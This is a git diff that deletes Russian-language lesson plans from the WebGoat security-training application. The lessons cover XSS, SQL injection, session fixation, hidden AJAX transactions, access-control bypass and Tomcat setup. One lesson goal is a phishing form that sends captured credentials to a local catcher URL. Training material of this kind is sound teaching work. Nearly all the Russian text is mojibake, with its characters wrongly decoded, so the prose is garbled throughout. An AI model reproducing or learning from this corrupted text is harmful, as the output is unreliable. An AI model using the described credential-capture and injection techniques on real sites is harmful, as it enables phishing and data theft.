- -Проверка вÑех принимаемых от пользователей данных вÑегда ÑчитаетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ практикой. -XSS-уÑзвимоÑти возникают в том Ñлучае, когда непроверенные пользовательÑкие данные -возвращаютÑÑ ÐµÐ¼Ñƒ же в HTTP-ответе. С иÑпользованием XSS-уÑзвимоÑтей вы можете Ñовершать -фишинг-атаки или же проÑто добавлÑть на уÑзвимую Ñтраницу какое-нибудь Ñтороннее Ñодержимое. -Ð’ таких ÑитуациÑÑ… поÑетителÑм-жертвам очень трудно отделить наÑтоÑщую информацию на Ñайте от -поддельной. - -

ОÑновные цели и задачи:

-Пользователь должен каким-либо образом добавить на Ñтраницу форму -запроÑа логина и паролÑ. При её отправке введённые данные должны уходить на Ð°Ð´Ñ€ÐµÑ -http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName - diff --git a/src/main/webapp/lesson_plans/ru/ReflectedXSS.html b/src/main/webapp/lesson_plans/ru/ReflectedXSS.html deleted file mode 100644 index e41ac6e48..000000000 --- a/src/main/webapp/lesson_plans/ru/ReflectedXSS.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Ðазвание урока: ИÑпользование отражённых XSS-уÑзвимоÑтей

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ð’Ñегда хорошей практикой ÑчиталаÑÑŒ проверка вÑех входÑщих данных на Ñтороне Ñервера. -XSS-уÑзвимоÑти могут возникать в тех ÑлучаÑÑ…, когда непроверенные пользовательÑкие -данные Ñразу помещаютÑÑ Ð² HTTP-ответ. Ð’ таких ÑлучаÑÑ… нападающий может Ñформировать URL, Ñодержащий в Ñебе -вредоноÑный код и передать его жертве(ам) через Ñторонний веб-Ñайт, почту или любым другим ÑпоÑобом. - -

ОÑновные цели и задачи:

-Ð’ Ñтом упражнении вашей целью ÑвлÑетÑÑ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ° Ñерверу Ñпециально Ñформированного -вредоноÑного ÑообщениÑ, которое, отобразившиÑÑŒ в ответной Ñтранице,оÑущеÑтвит -какие-нибудь опаÑные дейÑÑ‚Ð²Ð¸Ñ (например выполнит произвольный JS-код). \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html deleted file mode 100644 index 0b5a14085..000000000 --- a/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html +++ /dev/null @@ -1,15 +0,0 @@ -
-

Ðазвание урока: ДоÑтуп к Ñкрытым реÑурÑам Ñайта

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-ÐŸÑ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ñ‡ÐµÐ½ÑŒ чаÑто имеют админиÑтративные интерфейÑÑ‹ позволÑющие привилегированным пользователÑм -получать доÑтуп к такому функционалу, к которому обычные пользователи не допуÑкаютÑÑ. Кроме того, -Ñам Ñервер Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð¶ÐµÑ‚ иметь админиÑтративный интерфейÑ. -

Стандартные адреÑа:

-

ОÑновные цели и задачи: - -Попробуйте получить доÑтуп к админиÑтративному интерфейÑу WebGoat. Ð’Ñ‹ также можете попытатьÑÑ Ð¾Ð±Ñ€Ð°Ñ‚Ð¸Ñ‚ÑŒÑÑ Ðº админиÑтративному -интерфейÑу Tomcat. РаÑполагаетÑÑ Ð¾Ð½ по адреÑу /admin. Обратите внимание на то что непоÑредÑтвенного Ð¾Ñ‚Ð½Ð¾ÑˆÐµÐ½Ð¸Ñ Ðº данному уроку -он не имеет. - -

diff --git a/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html b/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html deleted file mode 100644 index 98bff910f..000000000 --- a/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html +++ /dev/null @@ -1,24 +0,0 @@ -
-

Ðазвание урока: Контроль доÑтупа оÑнованный на ролÑÑ…

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ð’ Ñхемах оÑнованных на ролÑÑ… Ñама роль предÑтавлÑет из ÑÐµÐ±Ñ Ð½Ð°Ð±Ð¾Ñ€ разрешений доÑтупа и привилегий. -Пользователю одновременно может быть приÑвоена одна или более ролей. -Подобные Ñхемы чаще вÑего включают в ÑÐµÐ±Ñ Ð´Ð²Ð° механизма: механизм работы Ñ Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñми доÑтупа и -механизм Ð½Ð°Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¸Ð²Ð¸Ð»ÐµÐ³Ð¸Ð¹. Ð’ ÑлучаÑÑ… когда Ñ€ÐµÐ°Ð»Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð´Ð°Ð½Ð½Ð¾Ð¹ Ñхемы имеет какие-то изъÑны пользователь может получить -доÑтуп к функционалу, к которому ему обращатьÑÑ Ð½Ðµ разрешено. Или он может каким-либо образом повыÑить Ñвои -привилегии в приложении. - - -

ОÑновные цели и задачи:

-Ваша цель ÑоÑтоит в изучении правил ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа данного Ñайта. -ÐšÐ°Ð¶Ð´Ð°Ñ Ñ€Ð¾Ð»ÑŒ имеет Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñ Ð½Ð° доÑтуп к определённому реÑурÑу (A-F). Каждому пользователю приÑвоена одна или более ролей. -Только пользователи имеющие роль [Admin] могу получать доÑтуп к F-реÑурÑам. Ð’ Ñлучае удачного Ð¿Ñ€Ð¾Ð²ÐµÐ´ÐµÐ½Ð¸Ñ Ð°Ñ‚Ð°ÐºÐ¸ -пользователь не имеющий роль [Admin] должен получить доÑтуп к F-реÑурÑам. -

Учебные реÑурÑÑ‹:

-Схема организации -
-Матрица ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа -
-Структура базы данных diff --git a/src/main/webapp/lesson_plans/ru/SQLInjection.html b/src/main/webapp/lesson_plans/ru/SQLInjection.html deleted file mode 100644 index 2078691e9..000000000 --- a/src/main/webapp/lesson_plans/ru/SQLInjection.html +++ /dev/null @@ -1,20 +0,0 @@ -
-

Ðазвание урока: Проведение SQL-инъекци

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -SQL-инъекции предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ð¾Ñ‡ÐµÐ½ÑŒ Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов оÑнованных на БД. -Методы их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно легки в оÑвоении, а ущерб Ñоздаваемый ими огромен и -при определённых уÑловиÑÑ… может произойти к компрометации вÑей ÑиÑтемы. Тем не менее, -количеÑтво интернет-Ñайтов Ñ ÑƒÑзвимоÑÑ‚Ñми данного типа поÑтоÑнно раÑтёт. -

-Ðа Ñамом деле вÑегда можно избежать поÑÐ²Ð»ÐµÐ½Ð¸Ñ ÑƒÑзвимоÑтей Ñтого клаÑÑа -еÑли в процеÑÑе напиÑÐ°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ Ñоблюдать общие меры предоÑторожноÑти. -Ðапример фильтровать вÑе поÑтупающие от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ. ОÑобенно те, которые -будут помещены в SQL-запроÑÑ‹. -
-

ОÑновные цели и задачи:

-Ð’ данном упражнении вы научитеÑÑŒ иÑпользовать SQL-инъекции. Кроме того, вам нужно будет -внеÑти в код правки, которые уÑтранÑÑ‚ Ñту уÑзвимоÑть в теÑтовом приложении. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html b/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html deleted file mode 100644 index c7433453d..000000000 --- a/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Ðазвание урока: Защита Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ политики одного иÑточника (Same Origin Policy)

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ключевым Ñлементом технологии AJAX ÑвлÑетÑÑ ÐºÐ¾Ð¼Ð¿Ð¾Ð½ÐµÐ½Ñ‚ XMLHttpRequest (XHR). Он позволÑет Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ JavaScript -отправлÑть запроÑÑ‹ на Ñторону Ñервера в аÑинхронном режиме. Из Ñоображений безопаÑноÑти Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð¼Ð¾Ð¶Ð½Ð¾ отправить -только на тот домен, Ñ ÐºÐ¾Ñ‚Ð¾Ñ€Ð¾Ð³Ð¾ загружена Ñ‚ÐµÐºÑƒÑ‰Ð°Ñ Ñтраница. - -

ОÑновные цели и задачи:

-Упражнение демонÑтрирует механизмы защиты обеÑпеченные политикой одного иÑточника (Same Origin Policy) -Через компонент XHR можно отправлÑть Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð»Ð¸ÑˆÑŒ на тот Ñервер, Ñ ÐºÐ¾Ñ‚Ð¾Ñ€Ð¾Ð³Ð¾ была загружена Ñ‚ÐµÐºÑƒÑ‰Ð°Ñ -Ñтраница. Попытки отправить Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð½Ð° другой Ñервер потерпÑÑ‚ неудачу. "; diff --git a/src/main/webapp/lesson_plans/ru/SessionFixation.html b/src/main/webapp/lesson_plans/ru/SessionFixation.html deleted file mode 100644 index 4d70c976e..000000000 --- a/src/main/webapp/lesson_plans/ru/SessionFixation.html +++ /dev/null @@ -1,31 +0,0 @@ -
-

Ðазвание урока: Закрепление ÑеÑÑии

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-ИÑпользование атак клаÑÑа 'Закрепление ÑеÑÑии' -
-
-

-Как работает данный вид атак: -

-Сервер может опознать конкретного Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¿Ð¾ уникальному идентификатору ÑеÑÑии. -Это позволÑет клиентам проходить поцедуру авторизации вÑего 1 раз, а затем уже обращатьÑÑ Ðº -приложению как авторизированное лицо. Ð’ некоторых приложениÑÑ… идентификатор ÑеÑÑии -передаётÑÑ Ð² ÑÑылках, в качеÑтве одного из параметров GET-запроÑа. ЗдеÑÑŒ и начинаютÑÑ Ð³Ð»Ð°Ð²Ð½Ñ‹Ðµ проблемы. -

-Ðтакующий может поÑлать жертве гипер-ÑÑылку Ñодеращую в Ñебе любой -идентификатор ÑеÑÑии. Это может быть Ñделано, например, через почтовое -Ñообщение, которое выглÑдит как обращение админиÑтрации Ñайта. -Когда жертва, кликнув по ней, попадёт на Ñайт и пройдёт авторизацию, то идентификатор ÑеÑÑии, выбранный -злоумышленником, Ñтанет идентификатором авторизованного пользователÑ-жертвы. -Ðтакующий может пройти по любой ÑÑылке передав Ñерверу Ñтот же идентификатор, -и Ñможет дейÑтвовать от чужого имени. -
-

ОÑновные цели и задачи:

- -Урок имеет неÑколько Ñтадий. Ð’Ñ‹ играете роль и атакующего и жертвы. -К концу урока вы поймёте что передача идентификаторов ÑеÑÑий в ÑÑылках -ÑвлÑетÑÑ Ð¾Ñ‡ÐµÐ½ÑŒ плохой практикой. - - diff --git a/src/main/webapp/lesson_plans/ru/SilentTransactions.html b/src/main/webapp/lesson_plans/ru/SilentTransactions.html deleted file mode 100644 index d1d15675d..000000000 --- a/src/main/webapp/lesson_plans/ru/SilentTransactions.html +++ /dev/null @@ -1,27 +0,0 @@ -
-

Ðазвание урока: Ðтаки ÑвÑзанные Ñо Ñкрытыми операциÑми.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Ðа данном уроке вы поймёте как оÑущеÑтвлÑÑŽÑ‚ÑÑ Ð°Ñ‚Ð°ÐºÐ¸ ÑвÑзанные Ñо Ñкрытыми операциÑми. -
-
-

-Как работают атаки такого рода: -

-Ðекоторые Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¾Ð¸Ð·Ð²Ð¾Ð´ÑÑ‚ манипулÑции Ñ Ñ‡ÑƒÐ²Ñтвительными пользовательÑкими данными (например Ñ Ð´ÐµÐ½ÑŒÐ³Ð°Ð¼Ð¸) -в Ñкрытом виде еÑли получат разрешение на Ñто Ñ…Ð¾Ñ‚Ñ Ð±Ñ‹ один раз. Это таит множеÑтво опаÑноÑтей. -Ðапример, в проÑтом веб-приложении Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб от имени клиента обратитьÑÑ Ðº любому URL необходимо -получить его идентификатор ÑеÑÑии (или другие данные, которые обеÑпечат необходимую идентификацию). -Ð’ Ñлучае Ñ AJAX вÑÑ‘ намного проще: обращение к Ñерверу может проиÑходить в Ñкрытом режиме без Ð¾Ð¿Ð¾Ð²ÐµÑ‰ÐµÐ½Ð¸Ñ Ð¾Ð± Ñтом пользователÑ. -Следовательно, внедрённый каким-либо образом в такую Ñтраницу вредоноÑный Ñкрипт может оÑущеÑтвлÑть важные -операции Ñовершенно незаметно Ð´Ð»Ñ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ð°. Ðапример переводить его деньги Ñо Ñчёта на Ñчёт.
-
-

ОÑновные цели и задачи:

- -* Это проÑтейшее приложение интернет-банкинга - Ñтраница перевода денег.
-* ЗдеÑÑŒ отображаетÑÑ Ñумма находÑщаÑÑÑ Ð½Ð° баланÑе, поле Ð´Ð»Ñ Ð²Ð²Ð¾Ð´Ð° аккаунта, которому деньги будут переведены, и поле -Ð´Ð»Ñ Ñуммы перевода.
-* Приложение иÑпользует AJAX Ð´Ð»Ñ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ¸ транзакции поÑле Ð¿Ñ€Ð¾Ð²ÐµÐ´ÐµÐ½Ð¸Ñ Ñлементарной проверки данных на клиентÑкой Ñтороне.
-* Ваша цель - попробовать оÑущеÑтвить от имени Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´ÐµÐ½ÐµÐ¶Ð½Ñ‹Ð¹ перевод в Ñкрытом виде.
- diff --git a/src/main/webapp/lesson_plans/ru/SoapRequest.html b/src/main/webapp/lesson_plans/ru/SoapRequest.html deleted file mode 100644 index 176260bcd..000000000 --- a/src/main/webapp/lesson_plans/ru/SoapRequest.html +++ /dev/null @@ -1,15 +0,0 @@ -
-

Ðазвание урока: ОÑущеÑтвление SOAP-запроÑов

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Эти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ -на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах. -РаÑÑмотрим их подробнее. У WebGoat еÑть Ñвой WSDL-файл, над которым -вы можете поÑкÑпериментировать. - -

ОÑновные цели и задачи:

-Попробуйте ÑоединитьÑÑ Ñ WSDL Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ браузера или какой-нибудь утилиты Ð´Ð»Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ñ‹ Ñ -веб-ÑервиÑами. URL ÑервиÑа http://localhost/WebGoat/services/SoapRequest . WSDL -может быть вызван добавлением в конец URL фразы ?WSDL. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html b/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html deleted file mode 100644 index d8a13b346..000000000 --- a/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html +++ /dev/null @@ -1,22 +0,0 @@ -
-

Ðазвание урока: Проведение чиÑловых SQL-инъекций

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -SQL-инъекции предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ð¾Ñ‡ÐµÐ½ÑŒ Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов оÑнованных на БД. -Методы их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно легки в оÑвоении, а ущерб Ñоздаваемый ими огромен и -при определённых уÑловиÑÑ… может произойти к компрометации вÑей ÑиÑтемы. Тем не менее, -количеÑтво интернет-Ñайтов Ñ ÑƒÑзвимоÑÑ‚Ñми данного типа поÑтоÑнно раÑтёт. -

-Ðа Ñамом деле вÑегда можно избежать поÑÐ²Ð»ÐµÐ½Ð¸Ñ ÑƒÑзвимоÑтей Ñтого клаÑÑа -еÑли в процеÑÑе напиÑÐ°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ Ñоблюдать общие меры предоÑторожноÑти. -Ðапример фильтровать вÑе поÑтупающие от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ. ОÑобенно те, которые -будут помещены в SQL-запроÑÑ‹. -
-

ОÑновные цели:

-РаÑÐ¿Ð¾Ð»Ð¾Ð¶ÐµÐ½Ð½Ð°Ñ Ð½Ð¸Ð¶Ðµ форма позволÑет пользователÑм Ñмотреть данные о погоде. -Вам необходимо Ñ ÐµÑ‘ помощью обнаружить в теÑтовом приложении уÑзвимоÑть. -Ð”Ð»Ñ Ð¿Ð¾Ð´Ñказки чуть ниже выводитÑÑ Ð¸Ñ‚Ð¾Ð³Ð¾Ð²Ñ‹Ð¹ запроÑ, который получаетÑÑ Ð½Ð° -Ñтороне Ñервера. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/SqlStringInjection.html b/src/main/webapp/lesson_plans/ru/SqlStringInjection.html deleted file mode 100644 index 4b329edea..000000000 --- a/src/main/webapp/lesson_plans/ru/SqlStringInjection.html +++ /dev/null @@ -1,22 +0,0 @@ -
-

Ðазвание урока: Как иÑпользовать Ñтроковые SQL-инекции

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -SQL-инъекции предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ð¾Ñ‡ÐµÐ½ÑŒ Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов оÑнованных на БД. -Методы их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно легки в оÑвоении, а ущерб Ñоздаваемый ими огромен и -при определённых уÑловиÑÑ… может произойти к компрометации вÑей ÑиÑтемы. Тем не менее, -количеÑтво интернет-Ñайтов Ñ ÑƒÑзвимоÑÑ‚Ñми данного типа поÑтоÑнно раÑтёт. -

-Ðа Ñамом деле вÑегда можно избежать поÑÐ²Ð»ÐµÐ½Ð¸Ñ ÑƒÑзвимоÑтей Ñтого клаÑÑа -еÑли в процеÑÑе напиÑÐ°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ Ñоблюдать общие меры предоÑторожноÑти. -Ðапример фильтровать вÑе поÑтупающие от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ. ОÑобенно те, которые -будут помещены в SQL-запроÑÑ‹. -
-
-

ОÑновные цели и задачи:

-РаÑÐ¿Ð¾Ð»Ð¾Ð¶ÐµÐ½Ð½Ð°Ñ Ð½Ð¸Ð¶Ðµ форма позволÑет пользователÑм проÑматривать их номера кредитных карт. -Попробуйте внеÑти SQL-выражение в поле фамилии. ПоÑле отправки формы вы чуть ниже увидите итоговый -SQL-запроÑ, который ÑформируетÑÑ Ð² приложении. Ð’ качеÑтве Ñамой фамилии иÑпользуйте 'Smith'. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/StoredXss.html b/src/main/webapp/lesson_plans/ru/StoredXss.html deleted file mode 100644 index 8d0b9e06e..000000000 --- a/src/main/webapp/lesson_plans/ru/StoredXss.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Ðазвание урока: Проведение хранимых XSS

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда -их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к -БД. Это важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то -внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте -таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре. - -

ОÑновные цели и задачи:

-Ð’Ñ‹ должны добавить такое Ñообщение, которое при проÑмотре другим пользователем будет формировать -на данной Ñтранице поддельное Ñодержимое. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html b/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html deleted file mode 100644 index c10a9b044..000000000 --- a/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html +++ /dev/null @@ -1,35 +0,0 @@ - - - - - - План урока - - - -
-

Ðазвание урока: Как ÑкÑплуатировать проблемы одновременной работы неÑкольких потоков.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð³ÑƒÑ‚ обрабатывать множеÑтво HTTP-запроÑов одновременно. -ЧаÑто разработчики иÑпользуют конÑтрукции не приÑпоÑобленные к многопоточной работе, и -Ñто Ñоздаёт возможноÑть иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¾ÑˆÐ¸Ð±Ð¾Ðº ÑвÑзанных Ñ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ñ‹Ð¼Ð¸ обращениÑми. -Ðапример когда одна и та же Ñтраница открываетÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾ разными пользователÑми и один их них видит -на ней данные другого. -Под приÑпоÑобленноÑтью к многопоточной работе подразумеваетÑÑ ÑпоÑобноÑть полей клаÑÑов и объектов -вÑегда находитьÑÑ Ð² верном ÑоÑтоÑнии при выполнении множеÑтва одних и тех же операций вызываемых -разными потоками. ПоÑкольку вÑе потоки иÑпользуют одно и то же рабочее проÑтранÑтво вызываемых методов, и в данном -проÑтранÑтве хранÑÑ‚ÑÑ Ð´Ð°Ð½Ð½Ñ‹Ðµ вÑех ÑвойÑтв отдельно взÑтых клаÑÑов, то множеÑтвенные одновременные попытки -обращений к ним могут привеÑти к неожиданным результатам. -
- -

ОÑновные цели:

-Ð’ приложении урока пользователь может воÑпользоватьÑÑ ÑƒÑзвимоÑтю данного типа Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтобы проÑматривать -авторизационные данные другого пользователÑ, еÑли одновременно Ñ Ð½Ð¸Ð¼ попытаетÑÑ Ð²Ñ‹Ð·Ð²Ð°Ñ‚ÑŒ одну -и ту же функцию. -ЗдеÑÑŒ вам придётÑÑ Ð¸Ñпользовать два браузера. -
- - diff --git a/src/main/webapp/lesson_plans/ru/TomcatSetup.html b/src/main/webapp/lesson_plans/ru/TomcatSetup.html deleted file mode 100644 index b125e4a24..000000000 --- a/src/main/webapp/lesson_plans/ru/TomcatSetup.html +++ /dev/null @@ -1,110 +0,0 @@ - -

ÐаÑтройка Tomcat



-

Введение

-

WebGoat раÑпроÑтранÑетÑÑ Ñ ÐºÐ¾Ð½Ñ„Ð¸Ð³ÑƒÑ€Ð°Ñ†Ð¸ÐµÐ¹ Tomcat по умолчанию. Ðа данной Ñтранице вы найдёте её короткое опиÑание и -ÑпиÑок возможных вариантов различных наÑтроек. Ð’ ÑлучаÑÑ… когда данное опиÑание вам не помогает обращайтеÑÑŒ к официальной -документации Tomcat. -Кроме того, нужно Ñказать что вÑÑ‘ нижеопиÑанное отноÑитÑÑ Ðº Ñтандартной конфигурации Ñервера работающего на 80-ом порту. -ЕÑли вы иÑпользуете Ð´Ð»Ñ Ñервера другой порт, то вам необходимо будет изменить конфигурацию ÑоответÑтвующим образом. -

- -

Ð¡Ñ‚Ð°Ð½Ð´Ð°Ñ€Ñ‚Ð½Ð°Ñ ÐºÐ¾Ð½Ñ„Ð¸Ð³ÑƒÑ€Ð°Ñ†Ð¸Ñ

-

ЗдеÑÑŒ имеетÑÑ Ð´Ð²Ðµ Ñтандартных конфигурации Tomcat. При их иÑпользовании доÑтуп к Ñерверу можно получить обращаÑÑÑŒ к хоÑту localhost. -Они полноÑтью идентичны, за иÑключением того что в первом Ñлучае ÑервиÑÑ‹ Tomcat запуÑкаютÑÑ Ð½Ð° портах 80 и 443 (SSL), а во втором - -на портах 8080 и 8443. Ð’ Linux вы должны запуÑтить WebGoat как root или Ñ Ð¸Ñпользованием sudo еÑли хотите чтоб он работал на портах -80 и 443. -Помните, что запуÑк ПО из под root`а очень опаÑное занÑтие, поÑтому мы наÑтоÑтельно рекомендуем иÑпользовать порты 8080 и 8443. -Ð’ Windows вы можете запуÑтить WebGoat.bat Ð´Ð»Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ñ‹ на 80-ом порту, или же WebGoat_8080.bat Ð´Ð»Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ñ‹ на порту 8080. -Ð’ Linux ту же Ñамую работу выполнÑет Ñкрипт WebGoat.sh и Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ же результата его необходимо запуÑтить либо командой -"webgoat.sh start80", либо "webgoat.sh start8080". Пользователь, Ð´Ð»Ñ Ð´Ð¾Ñтупа к приложению, -в Ñтандартной конфигурации - guest Ñ Ð¿Ð°Ñ€Ð¾Ð»ÐµÐ¼ guest. -

- -

ÐаÑтройка Ñервера

-

-ЕÑли вы единÑтвенный кто будет иÑпользовать WebGoat, то Ñтандартной конфигурации вам -будет вполне доÑтаточно. ЕÑли же вы будете запуÑкать его в лаборатории или клаÑÑе, то конфигурацию -нужно будет менÑть. Перед Ñтим Ñоветуем вам Ñделать её резервную копию. -

- -

Изменение портов

-

- Ð”Ð»Ñ Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð¿Ð¾Ñ€Ñ‚Ð¾Ð² откройте файл server_80.xml, котрый можно найти в tomcat/conf, и измените - не-SSL порт. Ðапример, еÑли вы хотите иÑпользовать порт 8079: -

- -
-	<!-- Define a non-SSL HTTP/1.1 Connector on port 8079 --> 
-	<Connector address="127.0.0.1" port="8079"...
-
-

-Конечно же вы можете изменить и порт SSL-ÑоединениÑ. Вот пример переноÑа SSL на порт 8442: -

-
-	<!-- Define a SSL HTTP/1.1 Connector on port 8442 --> 
-	<Connector address="127.0.0.1" port="8442"... 
-
-
- -

Делаем WebGoat доÑтупным Ð´Ð»Ñ Ð½ÐµÑкольких клиентов.

-

ЭТО ОТКРЫВÐЕТ Ð’ÐШ СЕРВЕР ДЛЯ РЕÐЛЬÐЫХ ÐТÐК ИЗ Ð’ÐЕ! ÐЕ ДЕЛÐЙТЕ ЭТОГО ЕСЛИ ВЫ ÐÐ 100% - ÐЕ УВЕРЕÐЫ Ð’ ÐЕОБХОДИМОСТИ ДÐÐÐОГО ШÐГÐ. ЭТРКОÐФИГУРÐЦИЯ МОЖЕТ БЫТЬ ИСПОЛЬЗОВÐÐРТОЛЬКО - Ð’ ДОВЕРЕÐÐЫХ СЕТЯХ. -

-

По умолчанию WebGoat доÑтупен только при обращении к хоÑту localhost. Ð’ лаборатории или клаÑÑе -у Ð²Ð°Ñ Ð¼Ð¾Ð¶ÐµÑ‚ возникнуть необходимоÑть организовать Ñервер Ñ Ð¼Ð½Ð¾Ð¶ÐµÑтвом клиентов. Ð’ данном Ñлучае -вы можете наÑтроить WebGoat ÑоответÑтвующим образом. -

-

